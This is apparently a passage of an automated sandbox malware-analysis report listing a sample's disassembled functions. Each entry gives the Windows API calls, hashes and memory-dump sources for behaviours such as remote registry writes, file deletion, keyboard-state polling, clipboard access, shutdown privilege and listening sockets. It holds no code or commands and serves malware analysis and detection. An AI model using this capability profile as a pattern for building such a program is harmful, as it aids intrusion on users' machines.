                                          • Opcode ID: 04fc0c8a4b042bd9bdb2400dde40ab518ea29ea75cc43cd1939e9497138f99c9
                                          • Instruction ID: 27e2ea26ba4ccbc3c6b0da978881a713932746e894ce2098f3316bedd61f4f3f
                                          • Opcode Fuzzy Hash: 04fc0c8a4b042bd9bdb2400dde40ab518ea29ea75cc43cd1939e9497138f99c9
                                          • Instruction Fuzzy Hash: FD31FF325042186BDF14EFB4EC68EEE77AC9F88360F104176F818E21A1DB74DA84DB61
                                          Function 00980857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00980953
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0098F910,00000000,?,00000000,?,?), ref: 009809C1
                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00980A09
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00980A92
                                          • RegCloseKey.ADVAPI32(?), ref: 00980DB2
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00980DBF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Close$ConnectCreateRegistryValue
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 536824911-966354055
                                          • Opcode ID: aaa00d5b734714ced5f027e09af0110bf9ccc03a6911f1df9975fc02bb2bb8ac
                                          • Instruction ID: 9d4d712bc9636f8361a4a867087a646e74ba5a2a0d193d5e9f17ba1f5e4de334
                                          • Opcode Fuzzy Hash: aaa00d5b734714ced5f027e09af0110bf9ccc03a6911f1df9975fc02bb2bb8ac
                                          • Instruction Fuzzy Hash: 4E0236756046119FCB54EF24D851E2AB7E9FFC9724F048858F89A9B3A2CB30EC45CB81
                                          Function 0096F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0096F113
                                          • _wcscmp.LIBCMT ref: 0096F128
                                          • _wcscmp.LIBCMT ref: 0096F13F
                                            • Part of subcall function 00964385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009643A0
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0096F16E
                                          • FindClose.KERNEL32(00000000), ref: 0096F179
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0096F195
                                          • _wcscmp.LIBCMT ref: 0096F1BC
                                          • _wcscmp.LIBCMT ref: 0096F1D3
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096F1E5
                                          • SetCurrentDirectoryW.KERNEL32(009B8920), ref: 0096F203
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0096F20D
                                          • FindClose.KERNEL32(00000000), ref: 0096F21A
                                          • FindClose.KERNEL32(00000000), ref: 0096F22C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 1824444939-438819550
                                          • Opcode ID: 076087c5b8f37689ddbff7c17cca7aa91074666c3e0973214ab8937583ef4358
                                          • Instruction ID: 861c164abe69e059e2ab5aeaa35770e6ab452bb12a6f0e12456f79ca49472471
                                          • Opcode Fuzzy Hash: 076087c5b8f37689ddbff7c17cca7aa91074666c3e0973214ab8937583ef4358
                                          • Instruction Fuzzy Hash: 9831C0365042196ADF24AEA4FC79EEE77AC9F893A4F100171E914E21A0DB30DA45DF64
                                          Function 0096A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0096A20F
                                          • __swprintf.LIBCMT ref: 0096A231
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0096A26E
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0096A293
                                          • _memset.LIBCMT ref: 0096A2B2
                                          • _wcsncpy.LIBCMT ref: 0096A2EE
                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0096A323
                                          • CloseHandle.KERNEL32(00000000), ref: 0096A32E
                                          • RemoveDirectoryW.KERNEL32(?), ref: 0096A337
                                          • CloseHandle.KERNEL32(00000000), ref: 0096A341
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                          • String ID: :$\$\??\%s
                                          • API String ID: 2733774712-3457252023
                                          • Opcode ID: 6d411211d874a9c6260a87f1bb2a1877665144a7bfd562f5571f2ddb19f17147
                                          • Instruction ID: b3d815b42a733262737e9ffbf6d5be560dcd20761d37befd4cd9bd468818f5dc
                                          • Opcode Fuzzy Hash: 6d411211d874a9c6260a87f1bb2a1877665144a7bfd562f5571f2ddb19f17147
                                          • Instruction Fuzzy Hash: C131C5B190411AABDB21DFA0DC49FEB77BCEF89740F1041B6F518E6260EB7496448F25
                                          Function 00957CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00958202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0095821E
                                            • Part of subcall function 00958202: GetLastError.KERNEL32(?,00957CE2,?,?,?), ref: 00958228
                                            • Part of subcall function 00958202: GetProcessHeap.KERNEL32(00000008,?,?,00957CE2,?,?,?), ref: 00958237
                                            • Part of subcall function 00958202: HeapAlloc.KERNEL32(00000000,?,00957CE2,?,?,?), ref: 0095823E
                                            • Part of subcall function 00958202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00958255
                                            • Part of subcall function 0095829F: GetProcessHeap.KERNEL32(00000008,00957CF8,00000000,00000000,?,00957CF8,?), ref: 009582AB
                                            • Part of subcall function 0095829F: HeapAlloc.KERNEL32(00000000,?,00957CF8,?), ref: 009582B2
                                            • Part of subcall function 0095829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00957CF8,?), ref: 009582C3
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00957D13
                                          • _memset.LIBCMT ref: 00957D28
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00957D47
                                          • GetLengthSid.ADVAPI32(?), ref: 00957D58
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00957D95
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00957DB1
                                          • GetLengthSid.ADVAPI32(?), ref: 00957DCE
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00957DDD
                                          • HeapAlloc.KERNEL32(00000000), ref: 00957DE4
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00957E05
                                          • CopySid.ADVAPI32(00000000), ref: 00957E0C
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00957E3D
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00957E63
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00957E77
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 3996160137-0
                                          • Opcode ID: 38f65c64034c8c3aff90314adcb7cfa860280e19c18e230cf2c23579230a8b18
                                          • Instruction ID: a1e20d369a8a20f1cba67d7ec52c6365c29e0d87bb37adfa5944f8d704fb5caf
                                          • Opcode Fuzzy Hash: 38f65c64034c8c3aff90314adcb7cfa860280e19c18e230cf2c23579230a8b18
                                          • Instruction Fuzzy Hash: A6615B71904209AFDF00DFA6EC85AEEBB79FF44301F148169F815E62A1DB319E09DB60
                                          Function 009166E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                          • API String ID: 0-4052911093
                                          • Opcode ID: ff2a2a0698ed95be107e8c0df3db0dc0d444bcaa02e1e64899d7194a7465bcc6
                                          • Instruction ID: 46bff916793b5ca461d56dc97a6a8dd2ca66a7e364eb7018c03edb5de2fe02e9
                                          • Opcode Fuzzy Hash: ff2a2a0698ed95be107e8c0df3db0dc0d444bcaa02e1e64899d7194a7465bcc6
                                          • Instruction Fuzzy Hash: 1E728D75E04219DBDB24CF59C8807EEB7B5FF48310F14816AE959EB290EB349E85CB90
                                          Function 0096001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00960097
                                          • SetKeyboardState.USER32(?), ref: 00960102
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00960122
                                          • GetKeyState.USER32(000000A0), ref: 00960139
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00960168
                                          • GetKeyState.USER32(000000A1), ref: 00960179
                                          • GetAsyncKeyState.USER32(00000011), ref: 009601A5
                                          • GetKeyState.USER32(00000011), ref: 009601B3
                                          • GetAsyncKeyState.USER32(00000012), ref: 009601DC
                                          • GetKeyState.USER32(00000012), ref: 009601EA
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00960213
                                          • GetKeyState.USER32(0000005B), ref: 00960221
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: 8626624c24778d9d9e93ca081c8f65848ff257823d3821e2928d8a6de8504e99
                                          • Instruction ID: ffc828c026b80460c0738c2d8c5b9bf234f70020e96ae6d3b446eb3e195739c4
                                          • Opcode Fuzzy Hash: 8626624c24778d9d9e93ca081c8f65848ff257823d3821e2928d8a6de8504e99
                                          • Instruction Fuzzy Hash: 6451FF3090878829FB35DB7089957EBBFB89F92380F08459ED5C2575C3DAA49B8CC761
                                          Function 009803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00980E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097FDAD,?,?), ref: 00980E31
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009804AC
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0098054B
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009805E3
                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00980822
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0098082F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                          • String ID:
                                          • API String ID: 1240663315-0
                                          • Opcode ID: 897dec919413909038fe2b5642b22eb18023b3cdd9f383243ed6d5515da40dfb
                                          • Instruction ID: 36189b68443f53b985a5535d81e1cd1290405be7648f9b3f1c9c6e506f1e35cf
                                          • Opcode Fuzzy Hash: 897dec919413909038fe2b5642b22eb18023b3cdd9f383243ed6d5515da40dfb
                                          • Instruction Fuzzy Hash: 7BE15F71604204AFCB54EF24C891E6ABBE8EFC9714F04896DF849DB3A2D731E945CB91
                                          Function 00974164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: 9dc14662f27dac8b8db4407364cf515566da71a826bf3d340a9f192a0977ef9c
                                          • Instruction ID: b9beb0521eecded97f5975ada2fadb1d5dd0149ef5195f2f656423ee3eedca6b
                                          • Opcode Fuzzy Hash: 9dc14662f27dac8b8db4407364cf515566da71a826bf3d340a9f192a0977ef9c
                                          • Instruction Fuzzy Hash: CA21BF362042149FDB00AF24EC19B697BA8FF54711F10C029F94ADB3A2DB30AC01DB84
                                          Function 009637EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00904750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00904743,?,?,009037AE,?), ref: 00904770
                                            • Part of subcall function 00964A31: GetFileAttributesW.KERNEL32(?,0096370B), ref: 00964A32
                                          • FindFirstFileW.KERNEL32(?,?), ref: 009638A3
                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0096394B
                                          • MoveFileW.KERNEL32(?,?), ref: 0096395E
                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0096397B
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0096399D
                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 009639B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 4002782344-1173974218
                                          • Opcode ID: c3933cb13d233d04d03742e012025e89ffc8ff61e1c39744329414212fbb771e
                                          • Instruction ID: 04980f1585787f43cdddce11df04be942b5c3f10264b0637f13f2c7d02e5cc39
                                          • Opcode Fuzzy Hash: c3933cb13d233d04d03742e012025e89ffc8ff61e1c39744329414212fbb771e
                                          • Instruction Fuzzy Hash: CF517D3180514DAECF05EBE0DA92AEEB778AF54314F604069E406B71D1EB316F09CF61
                                          Function 0096F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0096F440
                                          • Sleep.KERNEL32(0000000A), ref: 0096F470
                                          • _wcscmp.LIBCMT ref: 0096F484
                                          • _wcscmp.LIBCMT ref: 0096F49F
                                          • FindNextFileW.KERNEL32(?,?), ref: 0096F53D
                                          • FindClose.KERNEL32(00000000), ref: 0096F553
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                          • String ID: *.*
                                          • API String ID: 713712311-438819550
                                          • Opcode ID: 2a841df177727929de806dab247cee05cdfa14ebbeb7cdc049e33b784e5d7d08
                                          • Instruction ID: 57188c5d462722adff5e28e49aa28cef4706068e0d5b899059d71058a8b67a22
                                          • Opcode Fuzzy Hash: 2a841df177727929de806dab247cee05cdfa14ebbeb7cdc049e33b784e5d7d08
                                          • Instruction Fuzzy Hash: 04413D71904219AFDF14EFA4DC59AEEBBB8FF45314F144466F819A2291EB309E44CB50
                                          Function 00915760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 68b33c1b1ed6f7ebf7e3c673c67a7552f49046aece17eade55e8cdde9340d1d8
                                          • Instruction ID: 7c039fd2aa567245e0a98788721aa7854c813b50e1064ca984ea744a32abbb9d
                                          • Opcode Fuzzy Hash: 68b33c1b1ed6f7ebf7e3c673c67a7552f49046aece17eade55e8cdde9340d1d8
                                          • Instruction Fuzzy Hash: E112BA70A00609DFCF04DFA5D981AEEB7F9FF88310F114629E846A7290EB36AD54CB51
                                          Function 00963B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00904750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00904743,?,?,009037AE,?), ref: 00904770
                                            • Part of subcall function 00964A31: GetFileAttributesW.KERNEL32(?,0096370B), ref: 00964A32
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00963B89
                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00963BD9
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00963BEA
                                          • FindClose.KERNEL32(00000000), ref: 00963C01
                                          • FindClose.KERNEL32(00000000), ref: 00963C0A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 2649000838-1173974218
                                          • Opcode ID: b3829320c805a2906d3c6aa47141de2c51c405db6971a7c91e905508adfe219a
                                          • Instruction ID: 1534afe93c20733e9fa7aaa6427d04051f171c66300c55430bc5a1694b4ca2e9
                                          • Opcode Fuzzy Hash: b3829320c805a2906d3c6aa47141de2c51c405db6971a7c91e905508adfe219a
                                          • Instruction Fuzzy Hash: F9317E3140C385AFC701EF64D8919AFB7ACAE95314F404D2DF4E5922D1EB25EA09DB63
                                          Function 009651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 009587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0095882B
                                            • Part of subcall function 009587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00958858
                                            • Part of subcall function 009587E1: GetLastError.KERNEL32 ref: 00958865
                                          • ExitWindowsEx.USER32(?,00000000), ref: 009651F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-194228
                                          • Opcode ID: b53b21ca4361eec002f6156a52b4c1bd988d59c5c0d39e53af870b771f62c177
                                          • Instruction ID: 6aa05b5f73b485911f5a563e36acd9b8880d20e6e1984bf2e153d6712f011863
                                          • Opcode Fuzzy Hash: b53b21ca4361eec002f6156a52b4c1bd988d59c5c0d39e53af870b771f62c177
                                          • Instruction Fuzzy Hash: AC012B317A56116BF7286678ACBAFBB735CDB05351F220821FD23E21D2D9515C009790
                                          Function 00976283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009762DC
                                          • WSAGetLastError.WSOCK32(00000000), ref: 009762EB
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00976307
                                          • listen.WSOCK32(00000000,00000005), ref: 00976316
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00976330
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00976344
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
